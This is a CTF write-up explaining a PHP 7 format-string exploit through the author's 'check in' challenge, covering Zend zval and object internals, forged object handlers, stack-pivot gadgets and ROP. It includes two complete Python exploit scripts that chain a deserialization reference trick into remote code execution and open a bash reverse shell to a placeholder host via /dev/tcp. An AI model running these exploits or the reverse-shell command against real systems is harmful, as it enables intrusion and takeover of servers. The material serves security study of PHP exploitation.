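# PHP pwn Primer 1 - Format String Vulnerabilities
PHP is a convenient language for developers. However, it is an interpreted language built on the Zend virtual machine and it carries its own syntactic sugar, and vulnerabilities have been reported with almost every release. Because PHP is so widely deployed, studying how its vulnerabilities are exploited is worthwhile. Using a CTF challenge I wrote as the example, this post records my process of learning PHP exploitation (mainly targeting PHP 7).
## Understanding the basic structure of PHP variables
The basic building block in PHP is the `zval`. Its `type` field identifies which variable type it holds.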
```c
// /Zend/zend_types.h
struct _zval_struct {
    zend_value value; /* value */
    union {
        struct {
            ZEND_ENDIAN_LOHI_4(
                zend_uchar type, /* active type */
                zend_uchar type_flags,
                zend_uchar const_flags,
                zend_uchar reserved) /* call info for EX(This) */
        } v;
        uint32_t type_info;
    } u1;
    union {
        uint32_t next; /* hash collision chain */
        uint32_t cache_slot; /* literal cache slot */
        uint32_t lineno; /* line number (for ast nodes) */
        uint32_t num_args; /* arguments number for EX(This) */
        uint32_t fe_pos; /* foreach position */
        uint32_t fe_iter_idx; /* foreach iterator index */
        uint32_t access_flags; /* class constant access flags */
        uint32_t property_guard; /* single property guard */
        uint32_t extra; /* not further specified */
    } u2;
};
```
The type that each value of `type` stands for is also defined in `/Zend/zend_types.h`:
```c
/* regular data types */
#define IS_UNDEF 0
#define IS_NULL 1
#define IS_FALSE 2
#define IS_TRUE 3
#define IS_LONG 4
#define IS_DOUBLE 5
#define IS_STRING 6
#define IS_ARRAY 7
#define IS_OBJECT 8
#define IS_RESOURCE 9
#define IS_REFERENCE 10
/* constant expressions */
#define IS_CONSTANT_AST 11
/* internal types */
#define IS_INDIRECT 13
#define IS_PTR 14
#define _IS_ERROR 15
/* fake types used only for type hinting (Z_TYPE(zv) can not use them) */
#define _IS_BOOL 16
#define IS_CALLABLE 17
#define IS_ITERABLE 18
#define IS_VOID 19
#define _IS_NUMBER 20
```
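To make the layout concrete, here is a minimal sketch that decodes 16 raw bytes as a `zval`, assuming a 64-bit little-endian build (so `type` is the lowest byte of `u1.type_info`). The helper name `parse_zval` and the sample pointer are made up for illustration.

```python
import struct

# Type tags copied from the Zend/zend_types.h excerpt above.
ZVAL_TYPES = {
    0: "IS_UNDEF", 1: "IS_NULL", 2: "IS_FALSE", 3: "IS_TRUE",
    4: "IS_LONG", 5: "IS_DOUBLE", 6: "IS_STRING", 7: "IS_ARRAY",
    8: "IS_OBJECT", 9: "IS_RESOURCE", 10: "IS_REFERENCE",
}

def parse_zval(raw):
    """Decode 16 bytes as value (8 bytes), u1.type_info (4), u2 (4)."""
    value, type_info, u2 = struct.unpack("<QII", raw[:16])
    type_tag = type_info & 0xFF  # u1.v.type is the low byte on little-endian
    return {
        "value": value,
        "type": ZVAL_TYPES.get(type_tag, "unknown"),
        "type_flags": (type_info >> 8) & 0xFF,
        "u2": u2,
    }

# Hypothetical zval whose value points at some zend_object.
sample = struct.pack("<QII", 0x7F0000001000, 8, 0)
zv = parse_zval(sample)
print(hex(zv["value"]), zv["type"])
```

The same 16-byte shape is what a fake `zval` has to reproduce later in the exploit.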
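Besides `type`, the other field we care about is `value`. For non-scalar types it holds a pointer to the structure that stores the variable's actual data.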
![](https://i.imgur.com/KTNHbAM.png)
Examples are `zend_string` and `zend_object`, the latter being used constantly in PHP exploitation:
```c
struct _zend_string {
    zend_refcounted_h gc;
    zend_ulong h; /* hash value */
    size_t len;
    char val[1];
};
```
```c
struct _zend_object {
    zend_refcounted_h gc;
    uint32_t handle; // TODO: may be removed ???
    zend_class_entry *ce;
    const zend_object_handlers *handlers;
    HashTable *properties;
    zval properties_table[1];
};
```
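The field offsets matter when forging an object later. The sketch below derives them under assumed 64-bit sizes: `zend_refcounted_h` is taken to be two `uint32_t` values, pointers are 8 bytes, and each field is aligned to its own size. The `layout` helper is illustrative only.

```python
def layout(fields):
    """Return {name: offset}, aligning every field to its own size."""
    offsets, cursor = {}, 0
    for name, size in fields:
        cursor = (cursor + size - 1) // size * size  # round up to alignment
        offsets[name] = cursor
        cursor += size
    return offsets

# Assumed sizes for a 64-bit build.
ZEND_OBJECT_FIELDS = [
    ("gc.refcount", 4),
    ("gc.type_info", 4),
    ("handle", 4),
    ("ce", 8),
    ("handlers", 8),
    ("properties", 8),
    ("properties_table", 8),  # start of the first zval, 8-byte aligned
]

offsets = layout(ZEND_OBJECT_FIELDS)
for name, off in offsets.items():
    print("%-18s +0x%02x" % (name, off))
```

Under these assumptions `handlers` sits at `+0x18`, which matches where the exploits later in this post place the fake handlers pointer.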
Notice that a `zend_object` contains a pointer to a `zend_object_handlers` structure (`handlers`).
![](https://i.imgur.com/S5mq5E6.png)
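This is a table of function pointers. Whenever the engine operates on a `zend_object` (that is, performs some operation on a PHP object), it calls functions from this table.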
![](https://i.imgur.com/E3nLBfP.png)
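PHP's basic structures and most of its data live in a heap region managed by PHP's own allocator (backed by mmap) and are allocated and freed with `emalloc` and `efree`. I will not cover the allocator's internals in this post, but one simple rule is worth knowing: if you allocate a chunk and free it, the next allocation of the same size will usually be handed the same chunk again, because freed chunks go back onto a per-size free list.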
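The reuse rule can be illustrated with a toy model. This is not the Zend allocator, only a sketch with one last-in-first-out free list per chunk size; the class name and addresses are invented.

```python
class ToyBinAllocator:
    """Toy model: one LIFO free list per size, bump allocation otherwise."""

    def __init__(self, base=0x1000):
        self.next_fresh = base
        self.free_lists = {}

    def emalloc(self, size):
        bucket = self.free_lists.get(size)
        if bucket:
            return bucket.pop()  # reuse the most recently freed chunk
        addr = self.next_fresh
        self.next_fresh += size
        return addr

    def efree(self, addr, size):
        self.free_lists.setdefault(size, []).append(addr)

heap = ToyBinAllocator()
first = heap.emalloc(0x140)
heap.efree(first, 0x140)
second = heap.emalloc(0x140)  # same size: gets the freed chunk back
other = heap.emalloc(0x140)   # free list is empty again: fresh chunk
print(hex(first), hex(second), hex(other))
```

This predictability is what lets an address leaked in one request stay useful in the next one.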
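## PHP format strings
PHP's internal format-string functions add a few PHP-specific conversions, such as `%Z`. It treats the corresponding argument as a `zval*`, converts what it points to into a `zend_string`, and prints it.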
```c
// main/spprintf.c
switch (*fmt) {
    case 'Z': {
        zvp = (zval*) va_arg(ap, zval*);
        free_zcopy = zend_make_printable_zval(zvp, &zcopy);
        if (free_zcopy) {
            zvp = &zcopy;
        }
        s_len = Z_STRLEN_P(zvp);
        s = Z_STRVAL_P(zvp);
        if (adjust_precision && (size_t)precision < s_len) {
            s_len = precision;
        }
        break;
    }
```
```c
// Zend/zend.c
ZEND_API int zend_make_printable_zval(zval *expr, zval *expr_copy) /* {{{ */
{
    if (Z_TYPE_P(expr) == IS_STRING) {
        return 0;
    } else {
        ZVAL_STR(expr_copy, zval_get_string_func(expr));
        return 1;
    }
}
```
```c
ZEND_API zend_string* ZEND_FASTCALL _zval_get_string_func(zval *op) /* {{{ */
...
    case IS_OBJECT: {
        zval tmp;
        if (Z_OBJ_HT_P(op)->cast_object) {
            if (Z_OBJ_HT_P(op)->cast_object(op, &tmp, IS_STRING) == SUCCESS) {
                return Z_STR(tmp);
            }
        } else if (Z_OBJ_HT_P(op)->get) {
            zval *z = Z_OBJ_HT_P(op)->get(op, &tmp);
            if (Z_TYPE_P(z) != IS_OBJECT) {
                zend_string *str = zval_get_string(z);
                zval_ptr_dtor(z);
                return str;
            }
            zval_ptr_dtor(z);
...
```
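As we can see, if the `zval` is of object type, the `cast_object` function in the `handlers` of its `zend_object` gets called.
So once a format string vulnerability is triggered, we only need a controllable address in memory and three fake structures placed there: a fake `zval` (`type` set to `\x08`, `value` set to the address of the fake `zend_object`), a fake `zend_object` (`handlers` set to the fake handlers table), and a fake handlers table (`cast_object` set to the address we want to execute). That gives us control of RIP. On many PHP versions, however, controlling RIP alone is not enough, because RDI is not controllable. Against a remote target (rather than the CLI), jumping to a one_gadget does not work either, so we need to find a suitable gadget that pivots the stack to complete the exploit (this discussion covers 64-bit PHP).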
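The three fake structures can be sketched as one contiguous blob. The offsets below are assumptions for 64-bit PHP 7.2: `handlers` at `+0x18` inside `zend_object`, and `cast_object` at `+0xa8` inside the handlers table, which is where the exploits later in this post put their pivot gadget. `BASE` and `TARGET` are placeholder values, and the real exploits reuse the zeroed slots for a ROP chain.

```python
import struct

IS_OBJECT = 8
HANDLERS_OFF = 0x18     # assumed offsetof(zend_object, handlers)
CAST_OBJECT_OFF = 0xA8  # assumed offset of cast_object in the handlers table

def p64(x):
    return struct.pack("<Q", x)

def build_fake(base, target):
    """Lay out fake zval | fake zend_object | fake handlers at `base`."""
    obj_addr = base + 0x10
    handlers_addr = obj_addr + 0x20
    blob = p64(obj_addr) + p64(IS_OBJECT)             # zval: value, type
    blob += p64(0) * 3 + p64(handlers_addr)           # gc, handle, ce, handlers
    blob += p64(0) * (CAST_OBJECT_OFF // 8) + p64(target)  # ..., cast_object
    return blob

def resolve_cast_object(blob, base):
    """Follow the same pointers the %Z path follows; return the call target."""
    def read64(addr):
        return struct.unpack_from("<Q", blob, addr - base)[0]
    assert read64(base + 8) & 0xFF == IS_OBJECT
    obj = read64(base)
    handlers = read64(obj + HANDLERS_OFF)
    return read64(handlers + CAST_OBJECT_OFF)

BASE = 0x7F1234560000        # hypothetical address of the controlled buffer
TARGET = 0x4141414141414141  # hypothetical address to jump to
payload = build_fake(BASE, TARGET)
print(hex(resolve_cast_object(payload, BASE)), hex(len(payload)))
```

Walking the blob with `resolve_cast_object` is a cheap sanity check that the pointers chain up before the payload is sent to a real target.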
Below I walk through the full exploit using `check in`, a challenge I wrote for the vivo 2019 OGeek CTF.
## ogeek check_in writeup
![](https://i.imgur.com/r8p7Eaj.png)
Viewing the HTML source reveals a file leak.
![](https://i.imgur.com/P8SXk78.png)
![](https://i.imgur.com/cNlQc1F.png)
The challenge's entire Dockerfile and all required attachments are provided.
Reversing test.so and reading index.php reveals the vulnerabilities.
![](https://i.imgur.com/fRQ18p1.png)
![](https://i.imgur.com/30IreHO.png)
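### Deserialization vulnerability
`$this->index()` reads `S` from the cookie, passes it through `urldecode`, `base64decode`, `f` (RC4 encryption), and `base64decode` in that order, and hands the result to `php_var_unserialize`.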
![](https://i.imgur.com/TuqmvFg.png)
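The decoding chain and its inverse can be sketched in Python 3 as follows. The key `20190712` is the one used by the exploit scripts later in this post; the function names are my own, and the real server-side logic lives in test.so and index.php.

```python
import base64
from urllib.parse import quote, unquote

KEY = b"20190712"  # key taken from the exploit scripts in this post

def rc4(data, key=KEY):
    """Plain RC4; encryption and decryption are the same operation."""
    sbox = list(range(256))
    j = 0
    for i in range(256):
        j = (j + sbox[i] + key[i % len(key)]) % 256
        sbox[i], sbox[j] = sbox[j], sbox[i]
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + sbox[i]) % 256
        sbox[i], sbox[j] = sbox[j], sbox[i]
        out.append(byte ^ sbox[(sbox[i] + sbox[j]) % 256])
    return bytes(out)

def encode_cookie(serialized):
    """Attacker side: serialize -> base64 -> RC4 -> base64 -> urlencode."""
    return quote(base64.b64encode(rc4(base64.b64encode(serialized))))

def decode_cookie(cookie):
    """Server side: urldecode -> base64decode -> RC4 -> base64decode."""
    return base64.b64decode(rc4(base64.b64decode(unquote(cookie))))

sample = b'O:8:"CppClass":0:{}'  # illustrative serialized object
cookie = encode_cookie(sample)
print(cookie)
```

`decode_cookie(cookie)` returns the serialized bytes that would reach `php_var_unserialize`.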
The unserialized object then has `format`, `format_str`, and `other` assigned, in that order.
The whole object is returned, and `$obj->render()` is called to render it.
![](https://i.imgur.com/hOhzmNP.png)
`format` is forcibly set to `<h1> Wel ... %s ...`, `format_str` is taken from `name` in the unserialized result, and `other` is taken from `other` in the unserialized result.
![](https://i.imgur.com/qdKjdgI.png)
Inside `render()`, `format`, `format_str`, and `other` are passed to `render_s()`.
![](https://i.imgur.com/O9DGqoy.png)
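`format` is passed to `zend_vspprintf` as the format string, and the other two are passed as arguments.
The key to this challenge is therefore controlling `format`. Recall that `format` is hard-coded, but it is assigned before `format_str` and `other` are. If we make `format_str` a reference to `format`, then overwriting `format_str` through `name` indirectly overwrites `format` as well.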
```php
$obj->format = &$obj->format_str;
```
This gives us a format string vulnerability.
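Why the assignment order matters can be shown with a toy model. This is not PHP semantics in full, only a sketch where a shared `Slot` stands in for a PHP reference; the names are invented.

```python
class Slot:
    """A shared storage cell, standing in for a PHP reference."""

    def __init__(self, value=None):
        self.value = value

def simulate_index(name, aliased):
    """Replay the assignment order: format first, then format_str."""
    format_slot = Slot()
    # With the reference trick both properties share a single cell.
    format_str_slot = format_slot if aliased else Slot()
    format_slot.value = "<h1> Wel ... %s ..."  # hard-coded template
    format_str_slot.value = name               # attacker-controlled
    return format_slot.value

print(simulate_index("%p%p%p%p", aliased=False))
print(simulate_index("%p%p%p%p", aliased=True))
```

Without the alias the template survives; with it, the later write to `format_str` replaces the template with attacker input.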
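### Format string vulnerability
Following the approach above, we first use `%p` to leak the addresses of libc and libphp, then take control of RIP and look for a gadget that pivots the stack. (Because `other` is the second argument and its contents are controllable, the fake zval, object, and handlers can all be placed in it.)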
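A small sketch of how the `%p` output can be parsed. It splits on `0x` the same way the exploit scripts do, since consecutive `%p` values are printed with no separator. The offset `0x2d0240` comes from the first exploit below and is specific to that build; the sample response is made up.

```python
HEX_DIGITS = "0123456789abcdefABCDEF"
LIBPHP_LEAK_OFFSET = 0x2D0240  # from the first exploit below, build-specific

def split_pointers(body):
    """Return the value following each '0x' in an unseparated %p dump."""
    pointers = []
    for chunk in body.split("0x")[1:]:
        digits = ""
        for ch in chunk:
            if ch not in HEX_DIGITS:
                break  # trailing HTML or other text ends the number
            digits += ch
        if digits:
            pointers.append(int(digits, 16))
    return pointers

# Hypothetical response body for the format 'AAAAAAAA%p%p%p%p'.
sample = "AAAAAAAA0x10x7f3a5c0581400x20x7f3a5d2d0240"
ptrs = split_pointers(sample)
heap_addr = ptrs[1]                         # second %p: the `other` buffer
libphp_base = ptrs[3] - LIBPHP_LEAK_OFFSET  # fourth %p: a libphp pointer
print(hex(heap_addr), hex(libphp_base))
```

Splitting on the literal `0x` avoids a pitfall of a greedy hex regex, which would swallow the leading `0` of the next pointer. Text that starts with hex letters right after the last pointer would still be misread, so real responses should be checked by eye.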
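The register state at the moment we control RIP is shown below. We need to jump to a location that pivots the stack onto a part of the heap we control. Before searching for gadgets, note that RCX is controllable.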
![](https://i.imgur.com/3pa8ldb.png)
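Ideas for finding a gadget:
1. Exchange registers.
2. `push rcx; pop rsp;`
3. `ret 0x???;` (this requires clearing RAX, because a non-zero return value leads into zend_error and an abnormal exit, so the second ret needed for ROP is never reached)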
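As a rough aid for the second idea, the sketch below filters ROPgadget-style text output for gadgets that push something and later pop into `rsp` before returning. Only the first sample line comes from this post; the other two are invented for contrast, and any hit still needs manual review of the instructions in between.

```python
def pivot_candidates(ropgadget_lines):
    """Keep gadgets with a push followed later by 'pop rsp' and a final ret."""
    hits = []
    for line in ropgadget_lines:
        addr, sep, body = line.partition(" : ")
        if not sep:
            continue  # not a gadget line
        insns = [ins.strip() for ins in body.split(";")]
        pushes = [k for k, ins in enumerate(insns) if ins.startswith("push ")]
        pops = [k for k, ins in enumerate(insns) if ins == "pop rsp"]
        if pushes and pops and pushes[0] < pops[-1] and insns[-1].startswith("ret"):
            hits.append((int(addr, 16), insns))
    return hits

sample_output = [
    "0x0000000000114334 : push qword ptr [rcx] ; rcr byte ptr [rbx + 0x5d], 0x41 ; pop rsp ; ret",
    "0x0000000000021102 : pop rdi ; ret",             # hypothetical line
    "0x00000000000e1234 : push rax ; pop rbx ; ret",  # hypothetical line
]
hits = pivot_candidates(sample_output)
for address, insns in hits:
    print(hex(address), insns)
```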
![](https://i.imgur.com/Z7WfKTJ.png)
After writing the challenge, I was lucky enough to find a gadget of the second kind in libphp.
![](https://i.imgur.com/TT8ZSGa.png)
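On the day of the competition, however, I rebuilt the Docker image with no-cache and found that PHP had been updated and this gadget no longer existed.
I then found a usable gadget in libc, so the challenge stayed solvable. The libc address leak is not very stable, though: you have to search all the leaked addresses for one that ends in `aa`.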
```
ROPgadget --binary /lib/x86_64-linux-gnu/libc-2.27.so --depth 30 |grep "push "|grep "pop rsp"
0x0000000000114334 : push qword ptr [rcx] ; rcr byte ptr [rbx + 0x5d], 0x41 ; pop rsp ; ret
```
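Picking the libc pointer out of a long `%p` dump can be sketched like this. The offset `0x5b9aa` is taken from the second exploit below and only fits that libc build. Matching the low 12 bits instead of just the trailing `aa` is my own tightening, relying on ASLR keeping page offsets unchanged; the sample leaks are invented.

```python
LIBC_LEAK_OFFSET = 0x5B9AA  # from the second exploit below, libc-build specific

def libc_base_candidates(pointers, leak_offset=LIBC_LEAK_OFFSET):
    """Return possible libc bases from pointers whose page offset matches."""
    bases = []
    for ptr in pointers:
        if ptr & 0xFFF == leak_offset & 0xFFF:
            base = ptr - leak_offset
            if base > 0 and base not in bases:
                bases.append(base)
    return bases

# Hypothetical leaked values parsed from a %p dump.
leaks = [0x1, 0x7f3a5c058140, 0x7f3a5d2d0240, 0x7f3a5e25b9aa]
candidates = libc_base_candidates(leaks)
print([hex(base) for base in candidates])
```

If more than one candidate survives, each can be tried in turn, which mirrors the manual index adjustment mentioned in the exploit's comments.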
### exp
#### Before the update
```python
# Python 2 script; requires pwntools and requests
from pwn import *
import requests
from urllib import unquote,quote
import base64
import os
from binascii import unhexlify
key = '20190712'
def crypto(string):
    sbox = []
    for i in range(256):
        sbox.append(i)
    j = 0
    for i in range(256):
        j = (sbox[i] + j + ord(key[i%8]))%0x100
        sbox[i],sbox[j] = sbox[j],sbox[i]
    i1 = 0
    i2 = 0
    s = ''
    for i in range(len(string)):
        i1 = (i1 + 1)%0x100
        i2 = (i2 + sbox[i1])%0x100
        sbox[i1],sbox[i2] = sbox[i2],sbox[i1]
        s += chr(ord(string[i]) ^ sbox[(sbox[i1]+sbox[i2])%0x100])
    return s
command = "/bin/bash -c '/bin/bash -i >&/dev/tcp/xxxx/xxx 0>&1'\x00\x00"
target = "127.0.0.1"
burp0_url = "http://"+target+"/index.php?a=bbbbbbbbbbb%00cccccccc"
burp0_cookies = {"PHPSESSID": "769cb13v1vbmusfntcpqs3t3bl"}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", "Referer": "http://172.16.91.148/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data={"username": "admin", "password": ":admiN123:"}
#a = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
#print base64.b64decode(crypto(base64.b64decode(unquote(a.text.split("cookie='S=")[1].split("';location.hre")[0]))))
'''
a.php
<?php
Class CppClass {
    var $name,$format,$format_str,$other;
}
if($argc<=2){
    $obj = new \CppClass;
    echo serialize($obj);
}
else
{
    $format = base64_decode($argv[1]);
    $exp = base64_decode($argv[2]);
    $obj = new \CppClass;
    $obj->name = $format;
    $obj->format = &$obj->format_str;
    $obj->other = $exp;
    echo base64_encode(serialize($obj));
}
?>
'''
def f(fmt,exp):
    try:
        b = os.popen("php a.php "+base64.b64encode(fmt)+" "+base64.b64encode(exp)).read()
        burp0_cookies["S"] = quote(base64.b64encode(crypto(b)))
        return requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies).text
    except:
        return 0
format_str = 'AAAAAAAA%p%p%p%p'
exp = "D"*24+"EEEEEEEE"*37
a = f(format_str,exp).replace("<!-- ./html.zip --!>",'')
heap_addr = a.split('0x')[2]
log.success("heap_addr: 0x"+heap_addr)
heap_addr = int('0x'+heap_addr,16)
lib_php_addr = a.split('0x')[4]
lib_php_addr = int('0x'+lib_php_addr,16)-0x2d0240
log.success("lib_php7.2.so base addr : "+hex(lib_php_addr))
magic_addr = lib_php_addr + 0x2e512b # push rcx; pop rsp; ret;
pop3_ret = lib_php_addr + 0xdbb57
pop_rsi = lib_php_addr + 0xdb427
pop_rdi = lib_php_addr + 0xdbb5c
call_popen = lib_php_addr + 0x1C6A71
'''
Generate fake *zval and *zend_object and *zend_object_handlers
Convert fake *zend_object to *zend_string (%Z)
https://github.com/php/php-src/blob/e6f86fb17cd3a2dfe94ca1a0113a23194cb1915a/main/spprintf.c#L401
https://github.com/php/php-src/blob/21b0f444296ac44eadc7ed3474fba5978ec8163d/Zend/zend.c#L356
https://github.com/php/php-src/blob/7f994990eab4ffc3eb8cddca413dc4bcd03e3457/Zend/zend_operators.c#L878
We can control PC now.
Stack pivot (magic_addr) => ROP => popen(command,"r");
'''
format_str = "AAAAAAAA%p%Z%p%p"
exp = p64(heap_addr+0x10) # heap_addr
exp += p64(0x8) # heap_addr+0x8
exp += p64(pop3_ret) # heap_addr+0x10
exp += "AAAAAAAA" # heap_addr+0x18
exp += "BBBBBBBB" # heap_addr+0x20
exp += p64(heap_addr+0x30)
exp += p64(pop_rdi)
exp += p64(heap_addr+0xe8)
exp += p64(pop_rsi)
exp += p64(heap_addr+0xe0)
exp += p64(call_popen)
exp += "CCCCCCCC"*16
exp += p64(magic_addr)
exp += "r"+"\x00"*7
exp += command.ljust(80,'\x00')
exp += "AAAAAAAA"
a = f(format_str,exp)
log.success("exploit ok")
```
#### After the update
```python
# Python 2 script; requires pwntools and requests, and reuses a.php from the script above
from pwn import *
import requests
from urllib import unquote,quote
import base64
import os
from binascii import unhexlify
key = '20190712'
def crypto(string):
    sbox = []
    for i in range(256):
        sbox.append(i)
    j = 0
    for i in range(256):
        j = (sbox[i] + j + ord(key[i%8]))%0x100
        sbox[i],sbox[j] = sbox[j],sbox[i]
    i1 = 0
    i2 = 0
    s = ''
    for i in range(len(string)):
        i1 = (i1 + 1)%0x100
        i2 = (i2 + sbox[i1])%0x100
        sbox[i1],sbox[i2] = sbox[i2],sbox[i1]
        s += chr(ord(string[i]) ^ sbox[(sbox[i1]+sbox[i2])%0x100])
    return s
command = "/bin/bash -c '/bin/bash -i >&/dev/tcp/xxx/xxx 0>&1'\x00"
burp0_url = "http://47.112.98.102:14141/index.php?a=bbbbbbbbbbb%00cccccccc"
burp0_cookies = {"PHPSESSID": "769cb13v1vbmusfntcpqs3t3bl"}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", "Referer": "http://172.16.91.148/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data={"username": "admin", "password": ":admiN123:"}
#a = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
#print base64.b64decode(crypto(base64.b64decode(unquote(a.text.split("cookie='S=")[1].split("';location.hre")[0]))))
def f(fmt,exp):
    try:
        b = os.popen("php a.php "+base64.b64encode(fmt)+" "+base64.b64encode(exp)).read()
        burp0_cookies["S"] = quote(base64.b64encode(crypto(b)))
        return requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
    except:
        return 0
format_str = 'AAAAAAAA'+"%p"*700
exp = "D"*24+"EEEEEEEE"*37
a = f(format_str,exp).text.replace("<!-- ./html.zip --!>",'')
#print a
heap_addr = a.split('0x')[2]
log.success("heap_addr: 0x"+heap_addr)
heap_addr = int('0x'+heap_addr,16)
lib_php_addr = a.split('0x')[4]
lib_php_addr = int('0x'+lib_php_addr,16)-0x2d0240-0x3c0
log.success("lib_php7.2.so base addr : "+hex(lib_php_addr))
libc_addr = a.split('0x')
libc_addr = libc_addr[-1] # libc addr end with 'aa', you need to adjust the index according to the actual situation.
libc_addr = int("0x"+libc_addr,16)-0x5b9aa
log.success('libc_addr: ' + hex(libc_addr))
magic_addr = libc_addr + 0x114334 #push [rcx];...;pop rsp;
log.success('magic_addr: ' + hex(magic_addr))
pop_ret = lib_php_addr + 0xdb427
pop_rsi = lib_php_addr + 0xdb427
pop_rdi = lib_php_addr + 0xdbb5c
call_popen = libc_addr + 0x80930
format_str = "AAAAAAAA%p%Z%p%p"+"%p"*(700-4)
exp = p64(heap_addr+0x10) # heap_addr (rbx)
exp += p64(0x8) # heap_addr+0x8
exp += p64(heap_addr+0x20)# heap_addr+0x10 (rcx)
exp += "AAAAAAAA" # heap_addr+0x18
exp += p64(pop_ret) # heap_addr+0x20
exp += p64(heap_addr+0x30)
exp += p64(pop_rdi)
exp += p64(heap_addr+0xe8)
exp += p64(pop_rsi)
exp += p64(heap_addr+0xe0)
exp += p64(call_popen)
exp += "CCCCCCCC"*16
exp += p64(magic_addr)
exp += "r"+"\x00"*7
exp += command.ljust(80,'\x00')
exp += "AAAAAAAA"
a = f(format_str,exp)
log.success("exploit ok")
```